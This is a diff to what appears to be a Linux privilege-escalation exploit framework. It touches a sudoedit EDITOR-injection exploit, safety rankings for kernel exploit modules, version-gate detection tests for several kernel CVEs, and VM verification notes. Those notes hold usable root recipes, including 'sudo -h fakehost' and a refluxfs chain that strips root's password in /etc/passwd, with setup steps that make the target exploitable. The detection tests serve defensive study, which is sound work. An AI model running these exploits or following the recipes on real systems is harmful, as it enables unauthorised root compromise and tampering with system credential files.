/* Construct argv/envp for execve. We need a clean env so the
|
||||
* EDITOR string sudo sees is exactly ours. PATH is needed so the
|
||||
* compiled helper can be located — except we pass it absolute. */
|
||||
@@ -455,6 +468,7 @@ static skeletonkey_result_t sudoedit_editor_exploit(const struct skeletonkey_ctx
|
||||
char *envp[] = {
|
||||
editor_env,
|
||||
skel_env,
|
||||
tgt_env,
|
||||
"PATH=/usr/sbin:/usr/bin:/sbin:/bin",
|
||||
"TERM=dumb",
|
||||
NULL,
|
||||
@@ -469,6 +483,13 @@ static skeletonkey_result_t sudoedit_editor_exploit(const struct skeletonkey_ctx
|
||||
pid = fork();
|
||||
if (pid < 0) { perror("fork"); goto fail; }
|
||||
if (pid == 0) {
|
||||
/* CRITICAL: run from a NON-writable directory. sudoedit refuses to
|
||||
* edit any file whose parent directory is writable by the invoking
|
||||
* user (anti-symlink check). The injected "--" is resolved as a file
|
||||
* relative to CWD, so a writable CWD (home/tmp) makes sudoedit abort
|
||||
* with "--: editing files in a writable directory is not permitted"
|
||||
* before it ever runs the editor. "/" is not user-writable. */
|
||||
if (chdir("/") != 0) { perror("chdir /"); _exit(126); }
|
||||
execve(sudoedit_path, new_argv, envp);
|
||||
perror("execve(sudoedit)");
|
||||
_exit(127);
|
||||
|
||||
+6
-1
@@ -35,7 +35,7 @@
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
|
||||
#define SKELETONKEY_VERSION "0.9.8"
|
||||
#define SKELETONKEY_VERSION "0.10.0"
|
||||
|
||||
static const char BANNER[] =
|
||||
"\n"
|
||||
@@ -1016,9 +1016,14 @@ static int module_safety_rank(const char *n)
|
||||
!strcmp(n, "fragnesia")) return 87; /* ported page-cache writes; version-pinned detect, exploit NOT VM-verified */
|
||||
if (!strcmp(n, "ptrace_traceme")) return 85; /* userspace cred race */
|
||||
if (!strcmp(n, "ptrace_pidfd")) return 84; /* pidfd_getfd fd-steal race; ported, exploit NOT VM-verified */
|
||||
if (!strcmp(n, "cifswitch")) return 86; /* structural cifs.spnego keyring trust; ported, full chain NOT bundled/VM-verified */
|
||||
if (!strcmp(n, "sudo_samedit")) return 80; /* heap-tuned, may crash sudo */
|
||||
if (!strcmp(n, "refluxfs")) return 55; /* XFS reflink CoW race; DATA-oriented — cannot touch kernel memory (no oops/KASAN/panic path, unlike bad_epoll/ghostlock), so it never downs the box. VM-verified full root pop, but gated behind --full-chain because that path persistently rewrites /etc/passwd (backed up + restorable); plain --auto runs only the safe own-files trigger */
|
||||
if (!strcmp(n, "nft_catchall")) return 35; /* reconstructed nf_tables abort UAF; may KASAN-oops, primitive-only/not VM-verified */
|
||||
if (!strcmp(n, "af_unix_gc")) return 25; /* kernel race, low win% */
|
||||
if (!strcmp(n, "stackrot")) return 15; /* very low win% */
|
||||
if (!strcmp(n, "bad_epoll")) return 12; /* reconstructed epoll teardown race UAF; a won race frees a live struct file and rarely trips KASAN (silent-corruption risk), primitive-only/not VM-verified */
|
||||
if (!strcmp(n, "ghostlock")) return 11; /* reconstructed rtmutex/futex requeue-PI stack UAF; a won race corrupts the kernel stack + writes a near-arbitrary pointer (immediate-panic risk), primitive-only/not VM-verified — least predictable in the corpus */
|
||||
if (!strcmp(n, "entrybleed")) return 0; /* leak only, not LPE */
|
||||
return 50; /* kernel primitives — middle of pack */
|
||||
}
|
||||
|
||||
@@ -70,6 +70,11 @@ extern const struct skeletonkey_module vsock_uaf_module;
|
||||
extern const struct skeletonkey_module nft_pipapo_module;
|
||||
extern const struct skeletonkey_module ptrace_pidfd_module;
|
||||
extern const struct skeletonkey_module sudo_host_module;
|
||||
extern const struct skeletonkey_module cifswitch_module;
|
||||
extern const struct skeletonkey_module nft_catchall_module;
|
||||
extern const struct skeletonkey_module bad_epoll_module;
|
||||
extern const struct skeletonkey_module ghostlock_module;
|
||||
extern const struct skeletonkey_module refluxfs_module;
|
||||
|
||||
static int g_pass = 0;
|
||||
static int g_fail = 0;
|
||||
@@ -803,6 +808,330 @@ static void run_all(void)
|
||||
&sudo_host_module, &h_sudo_host_1917,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* ── cifswitch (CVE-2026-46243) ──────────────────────────────
|
||||
* Version-gated on Debian backports 5.10.257 / 6.1.174 / 6.12.90 /
|
||||
* 7.0.10. The VULNERABLE/PRECOND_FAIL split below the fix depends on
|
||||
* whether the cifs.upcall userspace path is present; we drive that
|
||||
* deterministically with SKELETONKEY_CIFS_ASSUME_PRESENT (1=present,
|
||||
* 0=absent) so the rows don't depend on cifs-utils being installed on
|
||||
* the runner. Patched-kernel rows return OK before the probe, so they
|
||||
* need no override. */
|
||||
|
||||
/* patched branch (exact 6.12.90 backport) → OK regardless of cifs */
|
||||
struct skeletonkey_host h_ciw_61290 =
|
||||
mk_host(h_kernel_6_12, 6, 12, 90, "6.12.90-test");
|
||||
run_one("cifswitch: 6.12.90 (exact backport) → OK via patch table",
|
||||
&cifswitch_module, &h_ciw_61290,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* 7.1.0 newer than every entry → mainline-inherited fix → OK */
|
||||
struct skeletonkey_host h_ciw_710 =
|
||||
mk_host(h_kernel_6_12, 7, 1, 0, "7.1.0-test");
|
||||
run_one("cifswitch: 7.1.0 above all backports → OK (mainline inherit)",
|
||||
&cifswitch_module, &h_ciw_710,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* vulnerable kernel (one below 6.12.90) + cifs path present → VULNERABLE */
|
||||
struct skeletonkey_host h_ciw_61289 =
|
||||
mk_host(h_kernel_6_12, 6, 12, 89, "6.12.89-test");
|
||||
setenv("SKELETONKEY_CIFS_ASSUME_PRESENT", "1", 1);
|
||||
run_one("cifswitch: 6.12.89 + cifs.upcall present → VULNERABLE",
|
||||
&cifswitch_module, &h_ciw_61289,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* same vulnerable kernel but cifs path absent → PRECOND_FAIL */
|
||||
setenv("SKELETONKEY_CIFS_ASSUME_PRESENT", "0", 1);
|
||||
run_one("cifswitch: 6.12.89 but cifs-utils absent → PRECOND_FAIL",
|
||||
&cifswitch_module, &h_ciw_61289,
|
||||
SKELETONKEY_PRECOND_FAIL);
|
||||
unsetenv("SKELETONKEY_CIFS_ASSUME_PRESENT");
|
||||
|
||||
/* ── nft_catchall (CVE-2026-23111) ───────────────────────────
|
||||
* Version-gated: predates-gate at catch-all set elements (~5.13),
|
||||
* then Debian backports 6.1.164 / 6.12.71 / 7.0.10, PLUS unprivileged
|
||||
* user_ns clone required (else PRECOND_FAIL). h_kernel_6_12 allows
|
||||
* userns; h_kernel_5_14_no_userns denies it. */
|
||||
|
||||
/* 5.12.50 predates catch-all set elements (~5.13) → OK */
|
||||
struct skeletonkey_host h_nca_512 =
|
||||
mk_host(h_kernel_6_12, 5, 12, 50, "5.12.50-test");
|
||||
run_one("nft_catchall: 5.12.50 predates catch-all (~5.13) → OK",
|
||||
&nft_catchall_module, &h_nca_512,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* 6.1.164 exact backport → OK via patch table */
|
||||
struct skeletonkey_host h_nca_61164 =
|
||||
mk_host(h_kernel_6_12, 6, 1, 164, "6.1.164-test");
|
||||
run_one("nft_catchall: 6.1.164 (exact backport) → OK via patch table",
|
||||
&nft_catchall_module, &h_nca_61164,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* 7.1.0 newer than every entry → mainline-inherited fix → OK */
|
||||
struct skeletonkey_host h_nca_710 =
|
||||
mk_host(h_kernel_6_12, 7, 1, 0, "7.1.0-test");
|
||||
run_one("nft_catchall: 7.1.0 above all backports → OK (mainline inherit)",
|
||||
&nft_catchall_module, &h_nca_710,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* 6.1.163 (one below the 6.1.164 backport) + userns → VULNERABLE */
|
||||
struct skeletonkey_host h_nca_61163 =
|
||||
mk_host(h_kernel_6_12, 6, 1, 163, "6.1.163-test");
|
||||
run_one("nft_catchall: 6.1.163 + userns allowed → VULNERABLE",
|
||||
&nft_catchall_module, &h_nca_61163,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 6.12.70 (one below the 6.12.71 backport) + userns → VULNERABLE */
|
||||
struct skeletonkey_host h_nca_61270 =
|
||||
mk_host(h_kernel_6_12, 6, 12, 70, "6.12.70-test");
|
||||
run_one("nft_catchall: 6.12.70 + userns allowed → VULNERABLE",
|
||||
&nft_catchall_module, &h_nca_61270,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* same vulnerable kernel but unprivileged userns denied → PRECOND_FAIL */
|
||||
struct skeletonkey_host h_nca_nouserns =
|
||||
mk_host(h_kernel_5_14_no_userns, 6, 1, 163, "6.1.163-nouserns-test");
|
||||
run_one("nft_catchall: 6.1.163 but userns denied → PRECOND_FAIL",
|
||||
&nft_catchall_module, &h_nca_nouserns,
|
||||
SKELETONKEY_PRECOND_FAIL);
|
||||
|
||||
/* ── bad_epoll (CVE-2026-46242) ──────────────────────────────
|
||||
* Pure version gate: vulnerable iff >= 6.4 (bug introduced
|
||||
* 58c9b016e128) AND below the fix on-branch (stable backport
|
||||
* 7.0.13; 7.1+ inherits via mainline). NO userns/CONFIG
|
||||
* precondition — epoll is reachable by every unprivileged user, so
|
||||
* there is deliberately no PRECOND_FAIL path to test. userns state
|
||||
* of the base host is irrelevant here. */
|
||||
|
||||
/* 6.1.100 predates the vulnerable epoll path (introduced 6.4) → OK */
|
||||
struct skeletonkey_host h_bep_61 =
|
||||
mk_host(h_kernel_6_12, 6, 1, 100, "6.1.100-test");
|
||||
run_one("bad_epoll: 6.1.100 predates the bug (introduced 6.4) → OK",
|
||||
&bad_epoll_module, &h_bep_61,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* 6.12.70 in range [6.4, 7.0.13) → VULNERABLE (no userns needed) */
|
||||
struct skeletonkey_host h_bep_61270 =
|
||||
mk_host(h_kernel_6_12, 6, 12, 70, "6.12.70-test");
|
||||
run_one("bad_epoll: 6.12.70 in range → VULNERABLE (no userns gate)",
|
||||
&bad_epoll_module, &h_bep_61270,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 7.0.5 on the 7.0 branch, below the 7.0.13 backport → VULNERABLE */
|
||||
struct skeletonkey_host h_bep_705 =
|
||||
mk_host(h_kernel_6_12, 7, 0, 5, "7.0.5-test");
|
||||
run_one("bad_epoll: 7.0.5 below the 7.0.13 backport → VULNERABLE",
|
||||
&bad_epoll_module, &h_bep_705,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 7.0.13 exact backport → OK via patch table */
|
||||
struct skeletonkey_host h_bep_70130 =
|
||||
mk_host(h_kernel_6_12, 7, 0, 13, "7.0.13-test");
|
||||
run_one("bad_epoll: 7.0.13 (exact backport) → OK via patch table",
|
||||
&bad_epoll_module, &h_bep_70130,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* 7.1.0 newer than every entry → mainline-inherited fix → OK */
|
||||
struct skeletonkey_host h_bep_710 =
|
||||
mk_host(h_kernel_6_12, 7, 1, 0, "7.1.0-test");
|
||||
run_one("bad_epoll: 7.1.0 above the backport → OK (mainline inherit)",
|
||||
&bad_epoll_module, &h_bep_710,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* ── ghostlock (CVE-2026-43499) ──────────────────────────────
|
||||
* Pure version gate over a FIVE-branch backport table (fixed
|
||||
* 7.0.4 / 6.18.27 / 6.12.86 / 6.6.140 / 6.1.175 on-branch, 7.1+
|
||||
* inherits mainline; introduced 2.6.39). Unlike bad_epoll's single
|
||||
* entry, this exercises kernel_range_is_patched()'s "strictly newer
|
||||
* than ALL entries" mainline-inherit clause: 6.13.x is newer than
|
||||
* some entries but not all, so it must stay VULNERABLE. The 5.x/4.19
|
||||
* LTS branches are affected with NO upstream fix. No userns/CONFIG
|
||||
* precondition (CVSS PR:L, any local user). */
|
||||
|
||||
/* 2.6.30 predates PI-futex requeue (introduced 2.6.39) → OK */
|
||||
struct skeletonkey_host h_ghl_2630 =
|
||||
mk_host(h_kernel_6_12, 2, 6, 30, "2.6.30-test");
|
||||
run_one("ghostlock: 2.6.30 predates PI-futex requeue → OK",
|
||||
&ghostlock_module, &h_ghl_2630,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* 5.10.200 — affected LTS with NO upstream stable fix → VULNERABLE */
|
||||
struct skeletonkey_host h_ghl_510 =
|
||||
mk_host(h_kernel_6_12, 5, 10, 200, "5.10.200-test");
|
||||
run_one("ghostlock: 5.10.200 (no upstream fix on 5.10) → VULNERABLE",
|
||||
&ghostlock_module, &h_ghl_510,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 6.1.174 one below the 6.1.175 backport → VULNERABLE */
|
||||
struct skeletonkey_host h_ghl_61174 =
|
||||
mk_host(h_kernel_6_12, 6, 1, 174, "6.1.174-test");
|
||||
run_one("ghostlock: 6.1.174 below the 6.1.175 backport → VULNERABLE",
|
||||
&ghostlock_module, &h_ghl_61174,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 6.1.175 exact backport → OK via patch table */
|
||||
struct skeletonkey_host h_ghl_61175 =
|
||||
mk_host(h_kernel_6_12, 6, 1, 175, "6.1.175-test");
|
||||
run_one("ghostlock: 6.1.175 (exact backport) → OK via patch table",
|
||||
&ghostlock_module, &h_ghl_61175,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* 6.12.85 one below the 6.12.86 backport → VULNERABLE */
|
||||
struct skeletonkey_host h_ghl_61285 =
|
||||
mk_host(h_kernel_6_12, 6, 12, 85, "6.12.85-test");
|
||||
run_one("ghostlock: 6.12.85 below the 6.12.86 backport → VULNERABLE",
|
||||
&ghostlock_module, &h_ghl_61285,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 6.13.0 — newer than 6.12.86 but OLDER than 6.18.27/7.0.4, EOL
|
||||
* branch with no fix → must stay VULNERABLE ("newer than ALL" test). */
|
||||
struct skeletonkey_host h_ghl_6130 =
|
||||
mk_host(h_kernel_6_12, 6, 13, 0, "6.13.0-test");
|
||||
run_one("ghostlock: 6.13.0 newer than some entries but not all → VULNERABLE",
|
||||
&ghostlock_module, &h_ghl_6130,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 7.0.3 one below the 7.0.4 backport → VULNERABLE */
|
||||
struct skeletonkey_host h_ghl_7003 =
|
||||
mk_host(h_kernel_6_12, 7, 0, 3, "7.0.3-test");
|
||||
run_one("ghostlock: 7.0.3 below the 7.0.4 backport → VULNERABLE",
|
||||
&ghostlock_module, &h_ghl_7003,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 7.0.4 exact backport → OK */
|
||||
struct skeletonkey_host h_ghl_7004 =
|
||||
mk_host(h_kernel_6_12, 7, 0, 4, "7.0.4-test");
|
||||
run_one("ghostlock: 7.0.4 (exact backport) → OK via patch table",
|
||||
&ghostlock_module, &h_ghl_7004,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* 7.1.0 newer than every entry → mainline-inherited fix → OK */
|
||||
struct skeletonkey_host h_ghl_710 =
|
||||
mk_host(h_kernel_6_12, 7, 1, 0, "7.1.0-test");
|
||||
run_one("ghostlock: 7.1.0 above all backports → OK (mainline inherit)",
|
||||
&ghostlock_module, &h_ghl_710,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* ── refluxfs (CVE-2026-64600) ───────────────────────────────
|
||||
* Version gate over a THREE-branch backport table (fixed 7.1.4 /
|
||||
* 6.18.39 / 6.12.96 on-branch, 7.2+ inherits mainline; introduced
|
||||
* 4.11) AND a storage precondition: the XFS reflink CoW race is only
|
||||
* reachable where a writable XFS filesystem is mounted, so a
|
||||
* vulnerable kernel on an ext4/btrfs-only host is PRECOND_FAIL, not
|
||||
* VULNERABLE. We drive that deterministically with
|
||||
* SKELETONKEY_XFS_ASSUME_REFLINK (1=reachable, 0=no XFS) so the rows
|
||||
* don't depend on the CI runner having an XFS volume. Patched and
|
||||
* predates-the-bug rows return OK before the probe is consulted, so
|
||||
* they hold regardless of the override.
|
||||
*
|
||||
* The RHEL-family base versions carry real weight here: 4.18 (el8)
|
||||
* and 5.14 (el9) are the primary affected population and sit below
|
||||
* every table entry. Note those vendors backport without bumping the
|
||||
* upstream version — detect() warns about that at runtime; these rows
|
||||
* pin the upstream-version behaviour only. */
|
||||
setenv("SKELETONKEY_XFS_ASSUME_REFLINK", "1", 1);
|
||||
|
||||
/* 3.10.0 — RHEL/CentOS 7; predates reflink entirely → OK */
|
||||
struct skeletonkey_host h_rfx_3100 =
|
||||
mk_host(h_kernel_6_12, 3, 10, 0, "3.10.0-el7-test");
|
||||
run_one("refluxfs: 3.10.0 (el7) predates XFS reflink → OK",
|
||||
&refluxfs_module, &h_rfx_3100,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* 4.10.0 — one below the 4.11 introduction → OK */
|
||||
struct skeletonkey_host h_rfx_4100 =
|
||||
mk_host(h_kernel_6_12, 4, 10, 0, "4.10.0-test");
|
||||
run_one("refluxfs: 4.10.0 one below the 4.11 introduction → OK",
|
||||
&refluxfs_module, &h_rfx_4100,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* 4.18.0 — RHEL 8 upstream base, below every entry → VULNERABLE */
|
||||
struct skeletonkey_host h_rfx_4180 =
|
||||
mk_host(h_kernel_6_12, 4, 18, 0, "4.18.0-el8-test");
|
||||
run_one("refluxfs: 4.18.0 (el8 base) + XFS → VULNERABLE",
|
||||
&refluxfs_module, &h_rfx_4180,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 5.14.0 — RHEL 9 upstream base → VULNERABLE */
|
||||
struct skeletonkey_host h_rfx_5140 =
|
||||
mk_host(h_kernel_6_12, 5, 14, 0, "5.14.0-el9-test");
|
||||
run_one("refluxfs: 5.14.0 (el9 base) + XFS → VULNERABLE",
|
||||
&refluxfs_module, &h_rfx_5140,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 6.1.100 — LTS branch with no published backport → VULNERABLE */
|
||||
struct skeletonkey_host h_rfx_61100 =
|
||||
mk_host(h_kernel_6_12, 6, 1, 100, "6.1.100-test");
|
||||
run_one("refluxfs: 6.1.100 (LTS, no upstream fix) → VULNERABLE",
|
||||
&refluxfs_module, &h_rfx_61100,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 6.12.95 one below the 6.12.96 backport → VULNERABLE */
|
||||
struct skeletonkey_host h_rfx_61295 =
|
||||
mk_host(h_kernel_6_12, 6, 12, 95, "6.12.95-test");
|
||||
run_one("refluxfs: 6.12.95 below the 6.12.96 backport → VULNERABLE",
|
||||
&refluxfs_module, &h_rfx_61295,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 6.12.96 exact backport → OK via patch table */
|
||||
struct skeletonkey_host h_rfx_61296 =
|
||||
mk_host(h_kernel_6_12, 6, 12, 96, "6.12.96-test");
|
||||
run_one("refluxfs: 6.12.96 (exact backport) → OK via patch table",
|
||||
&refluxfs_module, &h_rfx_61296,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* 6.13.0 — newer than 6.12.96 but OLDER than 6.18.39/7.1.4, an EOL
|
||||
* branch with no fix → must stay VULNERABLE ("newer than ALL" test). */
|
||||
struct skeletonkey_host h_rfx_6130 =
|
||||
mk_host(h_kernel_6_12, 6, 13, 0, "6.13.0-test");
|
||||
run_one("refluxfs: 6.13.0 newer than some entries but not all → VULNERABLE",
|
||||
&refluxfs_module, &h_rfx_6130,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 6.18.38 one below the 6.18.39 backport → VULNERABLE */
|
||||
struct skeletonkey_host h_rfx_61838 =
|
||||
mk_host(h_kernel_6_12, 6, 18, 38, "6.18.38-test");
|
||||
run_one("refluxfs: 6.18.38 below the 6.18.39 backport → VULNERABLE",
|
||||
&refluxfs_module, &h_rfx_61838,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 6.18.39 exact backport → OK */
|
||||
struct skeletonkey_host h_rfx_61839 =
|
||||
mk_host(h_kernel_6_12, 6, 18, 39, "6.18.39-test");
|
||||
run_one("refluxfs: 6.18.39 (exact backport) → OK via patch table",
|
||||
&refluxfs_module, &h_rfx_61839,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* 7.1.3 one below the 7.1.4 backport → VULNERABLE */
|
||||
struct skeletonkey_host h_rfx_713 =
|
||||
mk_host(h_kernel_6_12, 7, 1, 3, "7.1.3-test");
|
||||
run_one("refluxfs: 7.1.3 below the 7.1.4 backport → VULNERABLE",
|
||||
&refluxfs_module, &h_rfx_713,
|
||||
SKELETONKEY_VULNERABLE);
|
||||
|
||||
/* 7.1.4 exact backport → OK */
|
||||
struct skeletonkey_host h_rfx_714 =
|
||||
mk_host(h_kernel_6_12, 7, 1, 4, "7.1.4-test");
|
||||
run_one("refluxfs: 7.1.4 (exact backport) → OK via patch table",
|
||||
&refluxfs_module, &h_rfx_714,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* 7.2.0 newer than every entry → mainline-inherited fix
|
||||
* (2f4acd0fcd86 shipped in 7.2-rc4) → OK */
|
||||
struct skeletonkey_host h_rfx_720 =
|
||||
mk_host(h_kernel_6_12, 7, 2, 0, "7.2.0-test");
|
||||
run_one("refluxfs: 7.2.0 above all backports → OK (mainline inherit)",
|
||||
&refluxfs_module, &h_rfx_720,
|
||||
SKELETONKEY_OK);
|
||||
|
||||
/* Same vulnerable kernel, but no writable XFS filesystem mounted —
|
||||
* the stock Debian/Ubuntu (ext4) case. The bug is unreachable, so the
|
||||
* honest verdict is PRECOND_FAIL rather than VULNERABLE. */
|
||||
setenv("SKELETONKEY_XFS_ASSUME_REFLINK", "0", 1);
|
||||
run_one("refluxfs: 6.12.95 but no XFS mounted → PRECOND_FAIL",
|
||||
&refluxfs_module, &h_rfx_61295,
|
||||
SKELETONKEY_PRECOND_FAIL);
|
||||
unsetenv("SKELETONKEY_XFS_ASSUME_REFLINK");
|
||||
|
||||
/* ── coverage report ─────────────────────────────────────────
|
||||
* Iterate the runtime registry (populated by skeletonkey_register_*
|
||||
* calls in main()) and warn for any module that was not touched
|
||||
|
||||
Binary file not shown.
@@ -303,3 +303,52 @@ sudo_host:
|
||||
kernel_version: "4.15.0"
|
||||
expect_detect: VULNERABLE
|
||||
notes: "CVE-2025-32462; sudo -h/--host policy bypass (Stratascale, sibling of sudo_chwoot). Ubuntu 18.04 ships sudo 1.8.21p2, inside the vulnerable range [1.8.8, 1.9.17p0] (fixed 1.9.17p1), so detect() returns VULNERABLE on the version gate. Exercising exploit() empirically needs a sudoers rule scoped to a host other than the box hostname (and not ALL): provision e.g. 'vagrant fakehost = (ALL) NOPASSWD: ALL' in /etc/sudoers.d/, then 'SKELETONKEY_SUDO_HOST=fakehost skeletonkey --exploit sudo_host --i-know' pops root via 'sudo -h fakehost /bin/bash'. Brand-new addition this cycle; provisioner + sweep pending."
|
||||
|
||||
# ── cifswitch (CVE-2026-46243) addition ─────────────────────────────
|
||||
|
||||
cifswitch:
|
||||
box: ubuntu2404
|
||||
kernel_pkg: ""
|
||||
kernel_version: "6.8.0-117-generic"
|
||||
expect_detect: VULNERABLE
|
||||
verified: partial # detect() + add_key primitive confirmed; full root-pop + patched-kernel discriminator pending
|
||||
verified_on: "2026-06-08 — Ubuntu 24.04.4 LTS, kernel 6.8.0-117-generic, QEMU/HVF (x86_64)"
|
||||
notes: "CVE-2026-46243 'CIFSwitch'; cifs.spnego key type trusts userspace-forged authority fields (Asim Manizada, 2026-05-28). Fixed 5.10.257 / 6.1.174 / 6.12.90 / 7.0.10 (Debian backports of commit 3da1fdf4efbc, mainline 7.1-rc5); a ~19-year-old bug below those. PARTIALLY VM-VERIFIED 2026-06-08 on Ubuntu 24.04.4 / 6.8.0-117 (QEMU/HVF): (1) `modprobe cifs` registers the cifs.spnego key type (dmesg 'Key type cifs.spnego registered') — cifs-utils not required to reach the primitive; (2) an INDEPENDENT python ctypes add_key('cifs.spnego', forged uid/creduid/upcall_target) was ACCEPTED (serial 374940108; a `user`-key control also accepted), and the module's own exploit() reported 'primitive CONFIRMED' (serial 294765294) then honest EXPLOIT_FAIL; (3) detect() correctly returned PRECOND_FAIL with cifs-utils absent, and VULNERABLE under SKELETONKEY_CIFS_ASSUME_PRESENT=1. STILL PENDING: (a) a PATCHED kernel (>=6.12.90 / 7.0.10) to prove add_key is REJECTED there (i.e. that the probe discriminates fixed-from-vulnerable, not merely that the key type always allows userspace creation), and (b) the full user+mount-namespace + malicious-NSS root-pop, which is not bundled. Reproduce via tools/verify-vm or the QEMU offline harness used on 2026-06-08 (cloud image + payload iso, no guest networking needed)."
|
||||
|
||||
# ── nft_catchall (CVE-2026-23111) addition ──────────────────────────
|
||||
|
||||
nft_catchall:
|
||||
box: ubuntu2204
|
||||
kernel_pkg: ""
|
||||
mainline_version: "6.1.163" # one below the 6.1.164 backport; userns required
|
||||
kernel_version: "6.1.163"
|
||||
expect_detect: VULNERABLE
|
||||
notes: "CVE-2026-23111; nf_tables nft_map_catchall_activate abort-path UAF (inverted '!'). Public reproduction by FuzzingLabs; fixed upstream f41c5d1, Debian backports 6.1.164 (bookworm) / 6.12.73 (trixie) / 6.18.10 (sid); 5.10/bullseye still unfixed. detect() version-gates (catch-all set elements ~5.13; thresholds 6.1.164/6.12.73/6.18.10) AND requires unprivileged user_ns clone — a vulnerable kernel with userns locked (apparmor_restrict_unprivileged_userns / sysctl 0) is PRECOND_FAIL. exploit() forks an isolated child that builds a verdict map with a catch-all GOTO element and provokes an aborting batch to drive the abort-path UAF, observes nft_chain/cg-256 slabinfo, returns EXPLOIT_FAIL (primitive-only). The per-kernel leak + R/W + modprobe_path ROP is NOT bundled, and the trigger is RECONSTRUCTED from public analysis — NOT yet VM-verified. Provisioner: ensure unprivileged userns enabled (sysctl kernel.unprivileged_userns_clone=1 / drop apparmor restriction). A KASAN kernel will oops on a real fire; sweep + trigger validation pending."
|
||||
|
||||
# ── bad_epoll (CVE-2026-46242) addition ─────────────────────────────
|
||||
|
||||
bad_epoll:
|
||||
box: ubuntu2404
|
||||
kernel_pkg: ""
|
||||
kernel_version: "6.8.0-generic" # >= 6.4 (bug introduced 58c9b016e128) and below the 7.0.13 backport → VULNERABLE by version
|
||||
expect_detect: VULNERABLE
|
||||
notes: "CVE-2026-46242 'Bad Epoll'; epoll ep_remove-vs-__fput teardown race UAF (Jaeyoung Chung / J-jaeyoung kernelCTF PoC). Introduced 6.4 (58c9b016e128); fixed a6dc643c6931 (7.1-rc1), stable backport 7.0.13 (Debian forky 7.0.13-1 / sid 7.0.14-1); trixie 6.12.x still vulnerable, 6.1/5.10 not affected (code not present). detect() is a PURE version gate — no userns/CONFIG probe, because epoll is reachable by every unprivileged user; on Ubuntu 24.04 stock 6.8.0 (in [6.4, 7.0.13)) it returns VULNERABLE. To also confirm the PATCHED verdict, boot a >= 7.0.13 / 7.1 kernel and expect OK. exploit() forks a CPU-pinned child that builds the epoll race pair (waiter eventpoll watching a target eventpoll) and exercises the ep_remove-vs-__fput concurrent-close window a HARD-BOUNDED 48 attempts / 2s, widening it with close(dup()) false-sharing storms, snapshots the eventpoll/kmalloc-192 slab, and returns EXPLOIT_FAIL. DELIBERATELY UNDER-DRIVEN: a won race frees a live struct eventpoll (real corruption that rarely trips KASAN → possible SILENT destabilisation on a vulnerable host), so the module does NOT grind the race to a win, does NOT perform the cross-cache reclaim, and does NOT bundle the /proc/self/fdinfo arb-read + ROP root-pop. Trigger RECONSTRUCTED from the public kernelCTF PoC — NOT VM-verified. Lowest --auto safety rank (12). Provisioner caution: run only in a throwaway VM/snapshot — even the bounded trigger can, on a rare win, corrupt or panic a vulnerable kernel. Detection is intentionally weak (epoll syscalls ubiquitous); no yara. Sweep + trigger validation pending."
|
||||
|
||||
# ── refluxfs (CVE-2026-64600) addition ──────────────────────────────
|
||||
|
||||
refluxfs:
|
||||
box: rocky9-genericcloud # NOT a Vagrant box — Rocky-9-GenericCloud-Base.latest.x86_64.qcow2 booted under qemu/KVM
|
||||
kernel_pkg: "" # stock 5.14.0-687.10.1.el9_8.0.1 — below every backport entry (6.12.96/6.18.39/7.1.4) → VULNERABLE by version
|
||||
kernel_version: "5.14.0"
|
||||
expect_detect: VULNERABLE
|
||||
verified: "2026-07-23 — CONFIRMED END-TO-END (full root pop) on Rocky Linux 9.8 / 5.14.0-687.10.1.el9_8.0.1.x86_64, qemu/KVM, 6 vCPUs. The corpus's FIRST rpm-family verification. FULL CHAIN: `--exploit refluxfs --i-know --full-chain` reflink-cloned /etc/passwd, raced the CoW window, stripped root's password field on-disk (root:x: -> root::), evicted the stale page cache, and returned EXPLOIT_OK; `su root` (empty password) then gave uid=0 — 3/3 wins on a private-extent target (1244/3716/7913 rounds, 4-30 s) as unprivileged uid=1000 under SELinux Enforcing, every other passwd line preserved, file backed up + restored via `--cleanup`. PRIVATE-EXTENT PRECONDITION (found here, not in the writeup): the race only fires when the target's extent refcount is exactly the attacker-clone pair, i.e. the extent must be PRIVATE going in. Stock Rocky 9's /etc/passwd ships PRE-SHARED (refcount>1 in the base image) and was NOT attackable across ~41,000 rounds; rewriting it so the extent became private (byte-identical content, as any useradd/passwd/vipw does) made it fall in ~2,000 rounds. So the exploitable state is the normal administered state. detect() --active reports the target's extent state. Provisioner note for re-verification: after boot, run `cp --reflink=never /etc/passwd /root/pw && cp --reflink=never /root/pw /etc/passwd` (or just `passwd`/`useradd` anything) to move /etc/passwd to a private extent, then run the full chain. Plain --exploit (no --full-chain) runs only the safe own-files trigger (EXPLOIT_FAIL). 